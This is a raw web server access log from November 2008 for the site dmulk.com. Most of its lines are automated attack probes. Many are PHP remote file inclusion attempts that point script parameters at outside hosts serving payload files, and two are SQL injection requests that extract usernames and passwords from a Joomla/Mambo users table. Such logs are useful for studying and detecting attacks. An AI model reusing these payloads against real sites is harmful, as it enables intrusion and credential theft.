124.0.154.1 - - [04/Nov/2008:10:23:44 -0800] "GET /logs/access_080727.log//adminhead.php?path[docroot]=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:10:23:45 -0800] "GET /logs/access_080824.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:10:23:45 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:10:23:46 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 200 95096 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
213.251.177.84 - - [04/Nov/2008:10:24:00 -0800] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.48.102.49 - - [04/Nov/2008:10:24:16 -0800] "GET /logs/access_080901.log//convert/mvcw.php?step=1&vwar_root=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.102.49 - - [04/Nov/2008:10:24:17 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.102.49 - - [04/Nov/2008:10:24:17 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:10:24:23 -0800] "GET /logs/access_080727.log//adminhead.php?path[docroot]=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.48.102.49 - - [04/Nov/2008:10:24:25 -0800] "GET /logs/access_080127.log//convert/mvcw.php?step=1&vwar_root=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.154.1 - - [04/Nov/2008:10:24:58 -0800] "GET /logs/access_080727.log//adminhead.php?path[docroot]=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:10:25:05 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:10:25:08 -0800] "GET /logs/access_080615.log%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:10:25:08 -0800] "GET /logs/access_080615.log%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.112.231.75 - - [04/Nov/2008:10:25:20 -0800] "GET /logs/access_080430.log//include.php?path[docroot]=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.112.231.75 - - [04/Nov/2008:10:25:21 -0800] "GET /include.php?path[docroot]=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.112.231.75 - - [04/Nov/2008:10:25:21 -0800] "GET /logs//include.php?path[docroot]=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
124.0.210.117 - - [04/Nov/2008:10:25:24 -0800] "GET /logs/access_080727.log//include/print_category.php?setup[use_category]=1&dir=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:25:35 -0800] "GET /logs/access_080619.log/index.php?body=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:25:35 -0800] "GET /logs/index.php?body=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:25:36 -0800] "GET /index.php?body=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 200 94623 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:25:38 -0800] "GET /logs/access_080208.log/index.php?body=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
212.112.231.75 - - [04/Nov/2008:10:25:45 -0800] "GET /include.php?path[docroot]=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
92.48.102.49 - - [04/Nov/2008:10:25:53 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.210.117 - - [04/Nov/2008:10:25:59 -0800] "GET /logs/access_080727.log//adminhead.php?path[docroot]=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:26:00 -0800] "GET /logs/access_080208.log/index.php?body=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:26:00 -0800] "GET /logs/access_080619.log/index.php?body=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:26:00 -0800] "GET /logs/index.php?body=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:26:01 -0800] "GET /index.php?body=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 200 94639 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
212.112.231.75 - - [04/Nov/2008:10:26:10 -0800] "GET /logs/access_080410.log//include.php?path[docroot]=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
209.131.37.237 - - [04/Nov/2008:10:26:28 -0800] "GET /blog/wp-rss2.php HTTP/1.0" 200 653 "-" "YahooFeedSeeker/2.0 (compatible; Mozilla 4.0; MSIE 5.5; http://publisher.yahoo.com/rssguide; users 0; views 0)" "dmulk.com"
203.146.15.54 - - [04/Nov/2008:10:26:46 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:10:26:46 -0800] "GET /logs/access_080824.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:10:26:47 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 200 95087 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:10:27:05 -0800] "GET /logs/access_080824.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:10:27:05 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:10:27:05 -0800] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 200 95103 "-" "libwww-perl/5.805" "www.dmulk.com"
212.48.153.200 - - [04/Nov/2008:10:27:14 -0800] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.48.153.200 - - [04/Nov/2008:10:27:14 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
212.48.153.200 - - [04/Nov/2008:10:27:18 -0800] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:10:27:24 -0800] "GET /logs/access_080321.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
194.79.66.105 - - [04/Nov/2008:10:27:37 -0800] "GET //admin/addons/archive/archive.php?adminfolder=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:27:57 -0800] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:27:57 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:27:57 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:10:28:03 -0800] "GET /logs/task.php?task=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:10:28:03 -0800] "GET /task.php?task=http://www.grd.ie/images/alb???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.66.105 - - [04/Nov/2008:10:28:39 -0800] "GET /logs/access_080406.log///admin/addons/archive/archive.php?adminfolder=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.66.105 - - [04/Nov/2008:10:28:39 -0800] "GET //admin/addons/archive/archive.php?adminfolder=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.66.105 - - [04/Nov/2008:10:28:40 -0800] "GET /logs///admin/addons/archive/archive.php?adminfolder=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:28:48 -0800] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.79.66.105 - - [04/Nov/2008:10:29:21 -0800] "GET /logs/access_080408.log///admin/addons/archive/archive.php?adminfolder=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:10:29:54 -0800] "GET /logs/access_080914.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.249.67.57 - - [04/Nov/2008:10:30:05 -0800] "GET /bikes/dteel/2008_08_17/ HTTP/1.1" 200 999 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:30:06 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:31:33 -0800] "GET /logs/homepage.php?sel=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:31:33 -0800] "GET /logs/access_080820.log/homepage.php?sel=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:31:33 -0800] "GET /logs/access_080428.log/homepage.php?sel=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:31:33 -0800] "GET /homepage.php?sel=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:32:51 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:32:52 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:32:52 -0800] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:10:32:53 -0800] "GET /logs/access_081009.log%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:10:32:54 -0800] "GET /bikes/dteel/2008_07_03/ HTTP/1.0" 200 835 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.146.15.54 - - [04/Nov/2008:10:33:08 -0800] "GET /logs/access_081009.log%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:10:33:27 -0800] "GET /logs/access_080917.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:10:33:27 -0800] "GET /logs/access_080228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:10:33:27 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.37.24 - - [04/Nov/2008:10:33:27 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://69amigas.com/chat/chat/localization/spanish/echo.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.97.5.144 - - [04/Nov/2008:10:33:29 -0800] "GET /logs/access_080228.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.97.5.144 - - [04/Nov/2008:10:33:29 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.97.5.144 - - [04/Nov/2008:10:33:29 -0800] "GET /logs/access_080917.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.97.5.144 - - [04/Nov/2008:10:33:29 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:34:01 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:34:02 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:34:02 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:34:02 -0800] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:34:39 -0800] "GET /logs/access_080820.log/homepage.php?sel=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:34:43 -0800] "GET /logs/access_080428.log/homepage.php?sel=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:34:43 -0800] "GET /logs/homepage.php?sel=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:34:43 -0800] "GET /homepage.php?sel=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:35:04 -0800] "GET /logs/access_080321.log/homepage.php?sel=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:35:09 -0800] "GET /logs/access.log/homepage.php?sel=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:35:45 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:35:46 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:35:46 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:35:50 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:35:50 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
161.58.192.164 - - [04/Nov/2008:10:35:59 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://bentahan.com.ph//stores/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
161.58.192.164 - - [04/Nov/2008:10:36:00 -0800] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://bentahan.com.ph//stores/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.178.176.36 - - [04/Nov/2008:10:36:53 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.178.176.36 - - [04/Nov/2008:10:36:53 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:10:37:06 -0800] "GET /logs/access_071122.log HTTP/1.0" 200 35217 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.222.4.51 - - [04/Nov/2008:10:37:11 -0800] "GET /index.php?p=http://dld.go.th/info.txt? HTTP/1.1" 200 94534 "-" "libwww-perl/5.803" "www.dmulk.com"
92.48.102.49 - - [04/Nov/2008:10:37:33 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.102.49 - - [04/Nov/2008:10:37:33 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:38:41 -0800] "GET /logs/access.log/homepage.php?sel=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
38.108.176.10 - - [04/Nov/2008:10:38:41 -0800] "GET /logs/access_080321.log/homepage.php?sel=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
193.230.176.5 - - [04/Nov/2008:10:38:48 -0800] "GET /logs/index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a,0x4861636B20427920436176616C657261),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.230.176.5 - - [04/Nov/2008:10:38:50 -0800] "GET /index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a,0x4861636B20427920436176616C657261),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/* HTTP/1.1" 200 96971 "-" "libwww-perl/5.803" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:39:32 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:39:32 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:39:39 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.51.152.234 - - [04/Nov/2008:10:39:39 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.parcornithologique.com//forum/forums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.52.28 - - [04/Nov/2008:10:40:50 -0800] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
